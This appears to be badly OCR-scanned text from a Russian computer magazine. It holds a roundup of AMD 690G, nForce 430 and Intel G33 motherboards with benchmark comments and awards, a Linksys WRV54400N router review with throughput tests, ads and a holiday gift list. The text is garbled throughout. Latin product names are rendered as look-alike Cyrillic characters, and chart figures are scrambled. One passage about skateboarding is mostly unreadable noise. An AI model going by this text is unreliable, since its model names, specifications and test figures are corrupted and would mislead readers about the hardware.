Версия ѴѴіпсІоѵѵз: ѴѴіпсІоѵѵз ХР, 5Р2, Риз 



Список тестируемого 
оборудования: 

А51І5 М2МРѴ-ѴМ, А51І5 М2А-ѴМ РЮМІ. 
Еіііедгоир АМО690ѲМ-М2, ЕІЛедгоир ОЗЗТ- 
М2, Рохсопп 633М, ѲідаЬуІе 6А-633М-052Р 



Ошибка! 

В сентябрьском номере на странице 20 допущена ошибка. 
Правильное название ноутбука, получившего награду — МЗІ 5310 
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+| Модель на базе чипсета ЫѴЮІА пРогсе 6150 от А505 оснащена прилич- 
ным количеством различных портов и выходов, особенно если учесть ее 
сравнительно невысокую стоимость. Стоит отметить порт I ЕЕЕ1 394, атакже 
два разъема ЮЕ, если только, конечно, это еще для кого-то актуально на 
сегодняшний день. В остальном плата также понравится консерваторам: на 
ней можно найти разъем подключения флоппи-дисковода, а также два рас- 
паянных СОМ-порта. Не обошлось и без гигантского І_РТ на задней панели. 
Из систем охлаждения хочется отметить довольно высокий алюминиевый 
радиатор на чипсете, который, судя по тестам, неплохо справляется со сво- 
ими задачами. Но в целом модель достаточно типична, никаких интересных 
черт выделить не удалось. Хотя стабильные результаты и обилие устарев- 
ших интерфейсов позволяют порекомендовать ее для апгрейда старого ПК, 
обвешанного горами периферии. 

“'В качестве аудиоплаты выступает стандартный 5.1 -канальный кодек из 
конца 90-х. Конденсаторы в районе модулей памяти закреплены заметно 
хуже, нежели в других местах материнской карты. Брак или конструктивная 
особенность? 



РСМагк’05 — тест процессора, баллы 
ГІѴЮІА пРогсе 430 МСР АМР 690С Іпіеі СЗЗ 



7000 






ххо 



4 ОС 1 . 1 



ГХо 



і'Х:о 



10(Х' 



О 

АЗІІЗ АЗІІЗ ЕІІІедгоир АМй ЕІІІедгоир РохсоппСЗЗЗМ ОідаЬуІе ВЛ- 
ИЛ 2ІЧРѴ-ѴМ М 2А-ѴМ РЮМІ 690СМ-М2 ВЗЗТ-М2 ВЗЗМ-032Н 



Не стоитудивляться слишком схожим результатам: в синтетических 
тестах наподобие РСМагк Іпіеі Соге 2 био Е6600 и АМБ АіЫоп 64X2 5000+ 
действительно показывают примерно одинаковый уровень произво- 
дительности, чего не скажешь, например, об игровых приложениях, где 
камень от Іпіеіуверенно вырывается вперед 




А5Ц5 М2А-ѴМ НОМІ 




+, Стакими характеристиками плата активно позиционируется какреше- 
ние для мультимедийного ПК, основное предназначение которого — вывод 
изображения на дисплей телевизора большой диагонали. Не можем с 
этим поспорить: наличие цифрового, НОМІ, ПѲВ, 5-Ѵібео и АѴ разъемов 
действительно выделяет плату из ряда других моделей. При связывании 
ее узами проводов сЖК-телевизором ЗЬагр БС-42Х0 1 В II изображение 
не дало поводов усомниться в заявленном предназначении материнки. В 
остальном модель повторяет А51І5 М2ЫРѴ-ѴМ, различия только в мелочах. 
За исключением производительности. Как видно потестам, по этому пока- 
зателю чипсет АМР 6906 вкупе с графическим адаптером АТІ ПасІеопХ1250 
заметно обходятсвоего собрата на базетехнологий ЫѴЮІА! В тестах сис- 
темы прирост производительности достигает 40% ! Учитывая, что разница 
в цене составляет $2, а в худшую сторону эта модель не отличается ничем, 
своего коллегу по цеху она обходите лихвой. 

"'Ну, наверное, втакой модели совсем нелишним было бы поставить 
современный 7.1 -адаптер. 



Нагрев, градусы Цельсия 
ИѴШІА пРогсе 430 МСР АМР 690С ІпіеІ СЗЗ 

70С° 
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О 

АЗІІЗ АЗІІЗ ЕІІІедгоир АМЮ ЕІІІедгоир РохсоппСЗЗЗМ ЗідаЬуІеСА- 

М2ЫРѴ-ѴМ М 2А-ѴМ НйМІ 690БМ-М2 СЗЗТ-М2 ОЗЗМ-032В 

Классный результат АЗИЗ М 2А-ѴМ НОМІ доказывает, что мы особо 
отметили эту плату не напрасно 
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ЕШедгоир АМ06906М-М2 $64 

Технические характеристики: 

Чипсет: АМР 6900 
Южный мост: АТІ 5В600 
Интегрированное видео АТІ Расіеоп XI 250 
Слот- фактор: АМ2 

Поддержка процессоров: АМйАіЫоп 64X2, АіЫоп 64, Зегпргоп 
Память: 4х ОІММ, йОВ 2 533/667/800 МГц 



Слоты расширения: 1х РСГЕхргеввХІ 6, 1х РСІ-ЕхргеззХІ , 2х РСІ 32-ЬИ: 
Разъемы на задней панели: 2х Р5/2, 0-51ІВ, ОѴІ-й, 7.1 аисііо, 4х 115В 2.0, 



ТхБАЫ 



Периферия: 1х Ей О, 1х ЮЕ, 4х 5АТ/ 
Разъемы на заглушках: Эате-ро 
Размеры, мм: 245x244 



І 
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+| Бюджетная модель на базе АМБ 690 в варианте ЕІіІеОгоир выделяется 
небольшим количеством портов и всего двумя разъемами йІММ. На этом 
отличия от более дорогих моделей заканчиваются. А если смотреть шире, то 
все нетакуж плохо, даже очень хорошо. На задней панели стало свободно 
из-за эвакуированного БРТ-порта (хорошо!), а также из-за отсутствующего 
I ЕЕЕ1 394 (не очень хорошо). В остальном все необходимое для современного 
ПКесть, не обошлось даже без 7.1 -канального аудиокодека (небольшой 
камень в огород А5У5). Действительно, запаянные места для установки еще 
двух йІММ смотрятся несколько необычно, но серьезно придраться к компо- 
новке материнки не удалось. Между прочим, оба чипсета накрыты неболь- 
шими радиаторами, хотя втестах ЕІЛебгоир АМО6906М-М2 показала вполне 
хорошиетемпературные показатели, но, ксожалению, не рекордные. 

Разумеется, отсутствие порта ІЕЕЕ1394 (как на задней панели, так и 
распаянного на самой плате) — это минус. Несмотря на то что модель бюд- 
жетная, такой функционал здесь совсем бы не помешал. 





♦'Экономичный вариантна 633 отЕІіІебгоир. Минимальный набор 
интерфейсов, в целом аккуратная компоновка РОВ. Из положительных 
черт: 7.1 -канальный кодек, большое число 115В (четыре на задней панели, 
четыре распаянных), ну и, пожалуй, наличие четырех ОІММ-слотов. Радиа- 
тор и алюминиевая пластинка на чипсетах обеспечивают достойное, но не 
рекордное охлаждение. 

" Проблема этой платы втом, что она совсем не бюджетная. При вполне 
нормальной цене она характеризуется весьма скромным функционалом. К 
примеру, нет цифрового порта ОѴІ, нет в принципе ІЕЕЕ1394, не говоря уже 
о других интересных возможностях современного чипсета I пГеІ. Кроме того, 
весьма неудачно реализован зажим видеокарты на разъеме РСГЕхргевз 
XI 6 . Он лишен традиционного «хвостика», из-за чего деинсталляция гра- 
фического адаптера занимаетнемало времени, особенно если материнс- 
кая плата уже прикреплена к системному блоку. 



ѴѴіпПАН 

ЫѴЮІА пРогсе 430 МСР АМй 690С ІШеІ СЗЗ 

700 



ЗйМагк’ОЗ — баллы 

ЬІѴЮІА пРогсе 430 МСР АМР 690С ІШеІ СЗЗ 

3000 



600 




А8115 АЗІІЗ ЕШедгоир АМЭ ЕШедгоир РохаоппОЗЗМ ЕідаЬуІе ВА- 
ІИ 2ЫРѴ-ѴМ М 2А-ѴМ НРМІ 690ВМ-М2 633Т-М2 ѲЗЗМ-052Н 



Вот здесь пРогсе выстрелил, обойдя всех своих конкурентов. Коллеги из 
стана Іпіеі выступили достаточно скромно. Впрочем, результаты примерно 
эавны, и главное, что нетявных провалов. 



2500 




АЗІІЗ АЗІІЗ ЕШедгоир АМО ЕШедгоир РохсоппЕЗЗМ бідаЬуІеѲА- 

М2ЫРѴ-ѴМ М2А-ѴМРЮМІ 690БМ-М2 СЗЗТ-М2 СЗЗМ-032К 



3 ЗОМагк’ОЗ графика от Іпіеі заметно обошла АМБ 690, а вот беРогсе, увы, 
показал достаточно низкие результаты. Конечно, ни с одним из этих чипсе- 
тов не стоит соваться в требовательные современные игры, нотем не менее 
с проектами двух- или трехлетней давности они еще могут подружиться 



РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТАВИ- 
ТЕЛЬСТВАМ КОМПАНИЙ АБУБ, ЕС5, РОХСОЫЫ И СІОАВУТЕ 
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еѵшсАТЕ сю™ раяк & блмеетЕР рамт 

Было три утрд и я отонйп практически ті^г что хотгп 
нО чпРЛЬЭ И не дѵмлгі заканчивать поэтому ѵ% «мииоеііі я 
с ІИІ1ДОПЖАГІ і: НИМАІ Ь ГѴТ'Н Е ГЮСІг НН 1 V КВЕБЕКА Н АлкНА.!' ОСЬ 
- ВІЙ НАН ІЙ". I й ДЕ п Г V і' -іЕ ЭАК.Г МЧАЛАСЬ Н * ЭР.' Ч Т ОЫі г СКАТ і’ I ы> 

•О ВСЕМ САМЫЕ' 1 . ДЛИН ! V ЧЕРНЛАМ, КЯГОРЬ Е ТОЛЬКО МОЖНО Бк'ЛО 
НАИТИ ВЫБИРАЛИ ПЕСТДИЦЬ' Д.Г ИННОЮ ЬОПЕЕ 70 СТУПЕНЕЙ СЛИПЪ 
КАНАДСКИЙ т Е БЕЗ ПОКЕРА СЛАЙД КОТОРЫЙ 9Ы ВИДИТЕ нА 
ФОТОГРАФИЙ. НЕ Бъ П ОСОБЕННО ДЛИННЫМ НО ЗАТО ЫйЛ ТЕХНИЧЕСКИ 

сложным - сначала небольшой спѵск затем очень длинный 

ГОРИЗОНТАЛЬНЫЙ УЧАСТОК. ПОСЛЕ КОТОРОГО ПЕРИЛА СНОВА круто 
ШГИ ВНИЗ ВИ ОГО НАЧИНАЛОСЬ С ПЛОСКОЙ ПЛОЩАДКИ ИА ПаРКОѲкё 
и ра'Д'іё гы ішс -: !, ы,ні: і ! а:тг<)ЙЯЯИ ДРУГ дгѵ і ііймоі.ьк; 
лч-омоБИЛй чіобы запрет ьуг - нарэнл 




•тн^оіл 
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т'еггигм 



$122 



СідаЬуІе 0А-633МО52Р 




Рохсопп 633М 



Технические характеристики: 



Чипсет: Іп!е1633 
■Ожный мост: ІСН9Г 
Интегрированное видео: Іп!е16МА3100 
Слот-фактор: Соске! 775 



Поддержка процессоров: Іп!еІ® Соге 2 ОиасІ, Соге 2 Ех!гете, Соге 2 йио, 
э еп!іит й, 



аракл 

!3 

;Н9Р 



Память: 4х ОІММ, РйР 2 667/800/1 066 МГц 



11 

МЧ, 



Слоты расширения: 1х РСІ-ЕхргеззХІ 6, 1х РСІ-ЕхргеззХІ , 2х РСІ 32-Ьі 
э азъемы на задней панели: 2х Р5/2, 0-51ІВ, 7.1 аисііо, 4х ЕІ5В 2.0, 1х БАЫ 
1 х ІРТ, 1х СОМ, 1 х ІЕЕЕ1 394 
Іериферия: ІхРОО.ІхЮЕ, 6х5АТА 
э азъемы на заглушках: 2х еСАТА, 1 разъем питания 4-Ріп 
э азмеры, мм: 244x244 



Технические характеристики: 

Чипсет: ІпЕеІ 033 
■Ожный мост: ІСН9 

Интегрированное видео: Іп!еІ ОМА 31 00 
Слот-фактор: Соске! 775 



Поддержка процессоров: Іп!еІ® Соге 2 ОиасІ, Соге 2 Ех!геппе, Соге 2 Оио, 
э еп!іит йиаІ-Соге Е2ххх, Сеіегоп 4хх, Реп!іит й, Реп!іит 4 
Память: 4хОІММ,ООР 2 667/800 МГц 



* 



Слоты расширения: 1х РСІ-ЕхргеззХІб, 1х РСІ-ЕхргеззХІ , 2х РСІ 32-Ьі 
э азъемы на задней панели: 2х РС/2, О-СІІВ, 7.1 аисііо, 6х 115В 2.0, 1х БАЫ 
ІхБРТ, ІхСОМ 
Периферия: ІхЮЕ, 4хСАТА 
э азъемы на заглушках: ІЕЕЕ1394 
э азмеры, мм: 243x243 



О 



+ Одна из самых дорогих моделей в этом тесте. Ѳіда Ьу!е, чтобы подчерк- 
нуть этот факт, даже установила позолоченные алюминиевые радиаторы 
(лучше бы всеже медные). Традиционно для продукции этой компании 
распаянные на плате разъемы аккуратно выделены цветом, что удобно при 
выводе их на заднюю панель. Большой плюс этой модели — планка с двумя 
разъемами еСАТА и одним четырехпиновым портом питания. Малотого, 
специально для этого на самой плате имеются целых шесть САТА-слотов. 
Сомневаться же в удобстве внешнего разъема САТА не приходится. Может, 
это неактуально для внешнихжестких дисков, но, длятого чтобы просто 
быстро скинуть информацию с обычного накопителя, не разбирая при этом 
системный блок, это лучший способ. В остальном материнка вполне стан- 
дартна, никаких других отличительных чертобнаружено не было. 

" Но есть и за что ее поругать. Как и многие модели в этом тесте, этот 
вариант отОідаЬу!е лишен цифрового выхода йѴІ. Зато имеется СОМ и БРТ. 
К ним же можно присоседить РОй-слот, отсутствие которого, как показала 
плата Е1і!е0гоир на все том же I п!еІ ѲЗЗ, позволяет поместить ряд куда 
более полезных и актуальных компонентов. 
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+' Скромная, но удобная и функциональная плата на базе I п!еІ 633 от 
Рохсопп. В первую очередь хочется отметить продуманную систему охлаж- 
дения. Громоздкие радиаторы на обоих чипсетах неплохо отводяттепло, 
что демонстрируют результаты нашего теста: на несколько градусов плата 
стабильно обходитсвоих конкурентов. Понравились нарядно оформленные 
распаянные на плате разъемы 115В, ІЕЕЕ1394. На задней панели просто 
россыпь полезных и не очень портов: целых шесть 115В, 1ЕЕЕ1394 (на 
панельке), 7.1 -аудио, а также седовласые ветераны БРТ и СОМ (не иначе 
какследятза порядком). Компоновка платы очень плотная, но ни один 
компонент не мешает другому, все размещено очень грамотно как в смысле 
удобства сборки, так и в смысле качественного охлаждения горячих эле- 
ментов. Может быть, это потому что инженеры не стали лепить архаичный 
РОй-разъем, как на некоторых других платах этого теста. 

Неужели, наличие СОМ-порта важнее современного и популярного ОѴІ- 
порта? Сложно себе представить, что древние джойстики, мыши и модемы 
актуальнее ЖК-дисплея. 



ВЫВОДЫ 

Лучшей по своей конфигурации, 
эргономике и дизайну признаем 
материнскую плату А51І5 М2А-ѴМ 
ЕЮМІ, она прекрасно демонстри- 
рует, что даже на базе бюджетной 
интегрированной модели можно 
построить самый современный ПК 
с полным набором современных 
мультимедиа-функций. 

Приз «Лучшая покупка» достался 



ЕІі!едгоир АМО6906М-М2: несмот- 
ря на скромные внешние данные 
она ни в чем не уступает платам, 
стоящим на $20-30 дороже (пусть 
сумма небольшая, но это 50% от 
ее стоимости!). Благодаря пра- 
вильному выбору инженерами 
необходимых компонентов, в ней 
удалось совместить современную 
конфигурацию и минимальную 
розничную стоимость. 



Интересная ситуация сложилась 
с материнскими платами для 
процессоров Іп!еІ. По нашей 
системе оценок все призы рас- 
хватали материнки на базе АМй 
690, но это вовсе не значит, 
что ПК можно строить только с 
процессором АМР. Отметим луч- 
шую, на наш взгляд, модель под 
процессор Іп!еІ. Этого звания 
достойна 6ідаЬу!е 6А-633М- 



052В. Инженеры 6ідаЬу!е очень 
удачно использовали полно- 
размерную РОВ для создания 
функциональной, эргономичной 
интегрированной материнской 
платы. Цена ее несколько завы- 
шена, возможно, это объясняется 
большим числом дополнительных 
цифровых разъемов. Если бы не 
отсутствие йѴІ, приз этой модели 
был бы обеспечен. 30 . 
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Кга^ѵѵау рекомендует подлинную ѴѴіпсіоѵѵб Ѵізіа® Ноте Ргетіит 



ВЫБОР ЗА ТОБОЙ! 




Супермощный игровой компьютер Кга^ІѴѴау ІСІеа 

на базе четырехъядерного процессора Іпіеі® Соге™ 2 Оиабі 
и видеокарты 8 поколения ІЧѴЮІА СеРогсе 



Невиданное быстродействие! Потрясающая графика! 

кгагПімау 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 



Узнайте больше о преимуществах компьютера КгаЛѵѵау ІсІеа на сайте ѵѵѵѵѵѵ.кга^іѵѵау.ги. 
Приобрести компьютеры Кгайѵѵау ІсІеа вы можете в магазинах федеральных розничных сетей 

или у партнеров компании в регионах. 




Іпіеі, логотип Іпіеі, Іпіеі Соге и Соге являются товарными знаками на территории США и других стран. Товар сертифицирован. 
Комплектацию уточняйте у продавца. Реклама. 





Обзор роутера 

□пкзуз 

ѴѴКѴ54400М 

Гигабитный РгаЦ: N в исполнение Ьіпкзуз 

В прошлом номере мы рассмотрели гигабитный интернет-шлюз ТКЕЫОпеі ТЕѴѴ-633СК 
со встроенной РгаЦ N точкой доступа ѴѴі-Еі. Помимо него на рынке представлены схо- 
жие по функциональности модели от таких известных вендоров, как О-Ыпк, Ыпкзуз, 
ИЕТСЕАК и ЗМС. Безусловно, каждый производитель пытается оснастить свой продукт 
какими-то дополнительными функциями, чтобы выделиться из общей массы. В сегод- 
няшнем обзоре мы познакомимся с роутером Ьіпкзуз ѴѴК.Ѵ544СКЖ, который отличается 
расширенными функциями по обеспечению безопасности и возможностью организа- 
ции ѴРЕЕтуннелей с использованием протокола ІРЗес. 




Н ВНЕШНИЙ ВИД И КОМПЛЕКТАЦИЯ 

За дизайн корпуса роутера разработчикам можно смело поставить твер- 
дую пятерку. Внешний вид одновременно и стильный, и серьезный. Все 
три антенны вынесены на поворотную колодку, таким образом позволяя 
варьировать их направление практически во всех плоскостях. На переднюю 
панельтрадиционно вынесены светодиоды активности сегментов І_АЫ, ѴѴАЫ 
иѴѴ1_АЫ, индикаторы питания, статуса устройства и активности функции ІР5. 
На тыльной стороне находится кнопка сброса, порты І_АЫ и ѴѴАЫ, а также 
разъем питания. Комплектация включаеттолько самое необходимое: адаптер 
питания, патч-корд, Сй с подробной инструкцией по настройке и подставку 
для вертикальной установки. 

^ АППАРАТНАЯ НАЧИНКА 

Маршрутизатор построен на базе процессора ЗіагБеті 8ТР9202 с такто- 
вой частотой 250 МГц и двумя интегрированными гигабитными блоками 
МАС-уровня. Суммарный объем оперативной памяти составляет 64 Мб. Она 
организована двумя микросхемами Ыапуа ЫТ50516М16С5-5Т, работающими 
на частоте 200 МГц (ООР400; СІ_=3]. Встроенный коммутатор представляет 



собой чип Ѵі1:е55еѴ5С7385 — гигабитный свитч «система на кристалле» с 
пятью портами 10/100/1000, поддержкой функций 0о5, ЫпкАддгедаІіоп, ѴІ_АЫ, 
РіоѵѵСопіхоі. Беспроводная часть построена на базе Огай N чипсета Магѵеіі 
88ѴѴ8361 Р-ВЕМ1. Также на плате распаяна микросхема йазЬ-памяти Іпіеі 
3528Р640Р объемом 8 Мб. 

0 ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 

На ѴѴАЫ-интерфейсе роутера доступно применение статических настроек ІР, 
автонастройка с ОНСР-сервера или использование протоколов РРРоЕ, РРТР и 
Е2ТР. При настройке РРТР/Б2ТР доступ но задание ІР-адреса сервера только в 
видеІР. При активации ѴРЫ-соединениятеряется доступ ко внутренним ресурсам 
провайдера. И хотя присутствует возможность занесения статических маршрутов 
в таблицу маршрутизации, он и игнорируются роутером при активном ѴРЫ-со- 
единении. Имеется возможность работы с протоколом ІбМРи, какследствие, 
пропускание тиШсазІ-трафика. Однако доступ к потокам теряется при активации 
интернет-соединения с использованием протоколов РРТР/Е2ТР/РРРоЕ. 
Устройство может функционировать как в режиме ЫАТ-шлюза.таки в режиме 
классического роугинга на третьем уровне модели 051. Достаточно богаты 
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Технические характеристики: 

ІЫЦШоШЯЯІ < ѴѴАЫ ІР.І-45) ю/юо/юоо Мбит/сек, 4х (.АЫ (Р^-45) 
ю/юо/юоо Мбит/сек 

МЛЯ.І.І.Ы.Ы!І8ЬЦ.ШМ8Ы.Ц.Я.ИМДаі ЕЕЕ 802.11 Ь/д + РгаН N 
(до ЗОО Мбит/сек) 

^^^^^■ѴѴЕР [до 128 биті, ЖРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
ІТКІР/АЕ5), поддержка РА0ІІІ5 

іаііЧ!І8ІІІВНК»/.» д татаі 'ІАТ/ИАРТ, РупОКЗ, йНСР, 5(а(іс Коиііпд, 0о5, К5ТР, 
ѴІ-АЫ, ІРЗес 

8Й ШГВВЙ ШІДМИ5РІ . АСЬ, Оотаіп/Кеуѵѵогб РШег, ІР5, Ро5 

[ПЭТПК240 



настройки фильтрации нежелательного трафика. При создании АСІ_-правил 
используются следующие критерииітип сервиса (диапазон портов], интерфейс- 
источник, диапазон ІР источника, диапазон ІР назначения. Также существует воз- 
можность ограничения доступа заданным станциям в интернет по домену, ІІРІ_ 
или ключевому слову. Есть туги функция предотвращения вторжений ІР5. Базы 
сигнатур регулярно обновляются и выкладываются на сайте Ыпкзуз. Влияние 
этой функции на производительность роутера мы рассмотрим чуть позже. 

При создании ІРБес-туннелей единственный возможныйтип шифрования 
— ЗйЕБ с аутентификацией Мйб или 5НА-1 . Настройка ОоБ позволяет варь- 
ировать приоритет в зависимости от порта встроенного коммутатора, а также 
на исходящих потоках ѴѴАЫ -интерфейса в зависимости оттипа сервиса. В 
последнем случае возможен шейпинг (выделение полосы пропускания под 
правило) или ведение четырех очередей с разными приоритетами. 

Стоит отметить и то, что при внесении серьезных изменений в конфигурацию 
устройства (изменений ІР-адресов на интерфейсах, включение/выключение 
ѴѴі-Рі) применения настроек приходится ждать где-то полторы минуты. 

0 МЕТОДИКАТЕСТИРОВАНИЯ 

Для тестирования проводного и беспроводного сегментов использовался 
программный продукт ЫеШ СЬагіоІ: и скриптТЬгоидбриі: с передачей пакетов 
максимального и минимального размера. На двух станцияхустанавливались 
так называемые епброіпі-программы, затем в консоли ЫеШ СЬагіоІ запус- 
кался скрипт генерациитрафика. Все измерения проводилисьс прошивкой 
версии 1.01.03. 



1 . При тестировании пропускной способности ѴѴАЫ -> І_АЫ одна из станций 
подключалась к одному из портов свитча (интерфейс І_АЫ), вторая — кѴѴАЫ- 
порту. Таким образом, мы получали пиковую пропускную способность для 
ѴѴАЫ-интерфейса (также ее можно называть скоростью МАТ]. Измерялась ско- 
рость однонаправленной передачи (направления ѴѴАЫ І_АЫ и І_АЫ -> ѴѴАЫ) 
и в режиме полного дуплекса (РОХ). Также мы провели дополнительный замер 
при включении функции БігеатЕпдіпе. 

2. Поскольку при активации интернет-соединения по протоколу РРТР 
создается дополнительная нагрузка на центральный процессор роутера, мы 
также измерили пропускную способность РРТР. Для этого за ѴѴАІЧ-интер- 
фейсом маршрутизатора был поднятѴРЫ-сервер. Крометого, проверялась 
возможность установки ѴРЫ-соединения в случае размещения ѴРЫ-сервера 
вне сегмента нахождения нашего маршрутизатора. 

3. Так как в маршрутизаторе реализована поддержка работы с ѴРЫ-туннеля- 
ми по протоколу ІРБес, мы решили измерить его пропускную способность при 
активации этого режима. Испытания проводились в режиме ІРБес І_АЫ-Іо- 
І_АЫ. В качестве второго ІРБес-роутера выступал аналогичный по аппаратной 
начинке роутер Ыпкзуз РѴ54000, отличающийся только отсутствием модуля 
ѴѴі-Рі. Показания снимались в режиме с использованием шифрования ЗОЕ5- 
5НА1 . Все измерения по-прежнему проводились с помощью ЫеШ СЬагіоТ 

4. Для оценки скорости ѴѴі-Рі мы использовали РСМСІА-адаптер Ыпкзуз 
ѴѴРС4400Ы. Измерения проводились втипичной квартире из двухточекс 
разным удалением от роутера. В первом случае удаление не превышало 1 м и, 
какследует, измерялась максимальная скорость передачи данных. Во втором 
случае ноутбук с ѴѴі-Рі адаптером находился на расстоянии 10 м отточки до- 
ступа по диагонали за стеной. Во всех случаях использовалось шифрование 
трафика ѴѴРА-Р5К с ключом ТКІР 

5. В качестве дополнительного исследования была проведена проверка на 
уязвимости со стороны ѴѴАЫ-интерфейса с помощью программного продукта 
ТепаЫе Ые55іі5. Сканирование проводилось в двух режимах: с включенным и 
выключенным файрволом. 

Ж Результаты тестов 

Надо сказать, что гигабитный ѴѴАЫ — это уже не столько дань моде, сколько 
реальное снятие скоростного ограничения. Современные ВІБС-процессо- 
ры, устанавливаемые в 50Н0-роутеры, уже довольно давно обеспечивают 
производительность достаточную для обработки потока кадров на скорости 
более 100 Мбит/сек. Пропускная способность ѴѴАЫ-интерфейса у Ыпквуз 
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Во вкладке ІР5 можно увидеть график количества внешнего трафика и 
количества зафиксированных попыток вторжения 





ѴѴРѴ54400Ы в режиме ЫАТ ставит своеобразные рекорд среди ЭОНО-роутеров, 
побывавших в нашей тестовой лаборатории. В направлении ѴѴАЫ -> І_АЫ этот 
показатель составляет 51 1 ,2 Мбит/сек, в обратном — 51 9,5 Мбит/сек, а при од- 
новременной передаче в обе стороны — 527,8 Мбит/сек. Но надо отметить, что 
скорость такова без использования функции ІР5. При ее включении пропуск- 
ная способность падает в 50(!) раз. Все преимущества скоростного доступа во 
внешний мир при этом, разумеется, нивелируются. Таким образом, рекоменду- 
ем сразуже выключить этуопцию.таккакпоумолчанию она активирована. 



Тест производительности ѴѴАІМ-интерфейса с использованием протокола 
РРТР вообще несколько шокировал. Полученные результаты пропускной 
способности едва ли превышают 1 Мбит/сек. Причем онитаковы незави- 
симо отактивации/деактивации функции ІР5. Такое положение дел можно 
объяснить только неоптимизированным микрокодом прошивки. Так что 
остается надежда на то, что это будет исправлено программно. Произ- 
водительность ІРЭес-туннеля также оказалась на очень низком уровне 
— примерно 1 ,7 Мбит/сек. 

Сканирование в ТепаЫе ЫезБиз не выявило ни одной уязвимости у роуте- 
ра, что говорито его достаточно хорошей защищенности. 

г ВЫВОДЫ 

В сегодняшнем обзоре мы рассмотрели еще один гигабитный ЭгаЙ N 
ѴѴі-Рі роутер, теперь уже в исполнении компании Ыпкзуз. Эта модель 
в основном ориентирована на сегмент небольших компаний, где 
требуется организация выхода в интернет, создание беспроводной 
сети и использование ІРЭес ѴРЫ -тун нелей. Безусловным досто- 
инством рассмотренного продукта является высочайшая скорость 
ЫАТ-маршрутизации и, как следствие, возможность обеспечить 
сверхскоростной аплинк при использовании этого режима работы. 
Нельзя сказать того же о пропускной способности в случае исполь- 
зования РРТР/І_2ТР-клиентов. С последней на момент написания 
статьи версией прошивки она оказалась на очень низком уровне. Это 
касается и производительности ІРЭес-туннелей. А вот скорость ѴѴі-Рі 
находится на высоком уровне и при использовании И га К N адаптеров 
уже сейчас позволит ощутить все преимущества нового беспроводно- 
го стан да рта . ікі 



Пропускная способность МАЫ-интерфей 




Скорость Ѵ/і-Рі (минимальная длина пакета) 



На графике представлена пропускная способность в трех режимах: с ис- 
пользованием протоколов РРТР и ІРЭес и в режиме Віаііс ІР (ЫАТ Опіу) 




Скорость ѴѴі-Рі (максимальная длинна пакета) 



Падение скорости при использовании функции ІР5 





ТЕ5Т_І.АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ 
ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ ЫЫК5Ѵ5 
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Абсолютный рекорд скорости 
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(4951 786-49-45 



Розничные продажи 

(495) 777-66-55 



Компьютеры КіЕ&ати -з сети компьютерных езд сипов 
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СТ ыГуШИКФИ", Яр-Д Д, 9 і, І9НМЬ і 

и Г Ш. інтуінлетаі'". к.Ц..Бз , дг , -іпи;ыий". п.іп. ДИ т.ТМ-1 5-44: '' 

г. Коропе*, ТК .Сатурн', г р. Кпснонавтоо, д. 15 т. 1 



Интернет МД ГЭДиН 

ѵлѵѵѵ.кііеотхи 



/лзіеСе 



Дѳа ядоа, 
Делзй больше 



■ . н|я. I' *п Н-* I* іЧН I 



«і*ѵ ш - 



НЩ Інйв Л ЛтЛ НН 
іил. тяЧ іш,ч*т 






Подарки 

ЫУ2к+8 




Скоро Новый год и проблема подарков как никогда актуальна. Хороший и интересный пе- 
резент «в тему» — это большая проблема, решение которой требует времени и напряжения 
мозгов. Особенно тогда, когда бутылка виски уже не впечатляет. Специально под Новый год 
] [ сделал подборку интересных и очень хороших подарков, которые можно смело дарить 
таким же ІТ-гикам, как ты. Выбирай, не прогадаешь :). 




ѴѴЕ5ТЕШ РІСІТАЬ 

МУВООКУУОКЬР 

ЕШТЮШ 

Цена: $499 за 1 Тб и $799 за 2 Тб 
Сайт: ѵѵѵѵѵѵ.\л/сІтуЬоок.сопп 

Этот внешний накопитель огромной емкостью в 1 или 2 Тб создан специ- 
альнодлятех, кому вечно не хватает свободного места. Отличный подарок 
для заядлого меломана, фотографа или любителя фильмов высокой чет- 
кости. А главная фишка девайса - это развитые коммуникации. Ты легко 
можешь подключить его к локальной сети или ѴѴі-Рі точке и организовать 
сетевой доуступ к данным. Супер-вещь! 



РШРАІЫТЕШЕТ 
8ЕСЦШТУ 2008 

Цена: 2238 рублей 
Сайт: ѵѵѵѵѵѵ.ѵігизІаЬ.ги 

Это комплексное решение по защите домашнего компьютера включает 
в себя антивирус, файрвол, антиспам, средства защиты в беспроводных 
сетях и многое другое. Оно защититтри домашних компьютера и обезо- 
пасит интернет-платежи и личные данные. Подойдеттвоим друзьям или 
родственникам, которые нетакхорошо разбираются в компьютерной 
безопасности, какты. 
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Цена: 16990 рублей 
Сайт: ѵ\лллл/.Ы:с1;оисЬ.сот 



Цена: от $299 до $849 
Сайт: ѵѵѵѵѵѵ.сігадопіазегз.сот 



Небольшой и стильный коммуникатор на базе ѴѴіпсІоѵѵз МоЬіІе 6.0 
Рго^еззіопаі. Технология ТоисбРБО позволяетуправлять устройством при 
помощи пальцев. Для такого управления нужен специфический интер- 
фейс — Тоисб СиЬе. Переключение между списком контактов, приложени- 
ями и другими функциями происходит посредством вращения виртуаль- 
ного куба. Из других вкусностей — ѴѴі-Рі и встроенная 2-Мп камера. 



Лазерный фонарь мощностью достаточной, чтобы прожечь пластик. Есть 
в вариантах от75 мВтдоЗОО мВт. Последний стоит дорого, ножжети 
светит на свои деньги. Тонкий зеленый луч видно очень далеко, особенно 
ночью. Благодаря хорошей системе охлаждения может светить продол- 
жительное время без выключения. Только аккуратнее — ослепнуть от 
такого луча очень просто. 






ЮХСОШМАК8 

Цена: $230 

Сайт: ѵѵѵѵѵѵТохсопп.ги 

РІовая материнская плата на базе чипсета Р35 представляет собой ог- 
ромное поле для экспериментов над производительностью. Целый набор 
оверклокерских функций и утилиты 0 Іасі іаЕог В 108, Аедів Рапеі, РохОпе 
позволяют до предела увеличить разгонный потенциал платы, при этом 
не пренебрегая надежностью. Именно на этой плате удалось разогнать 
Соге 2 ОиасІ до 6 ГГц. 



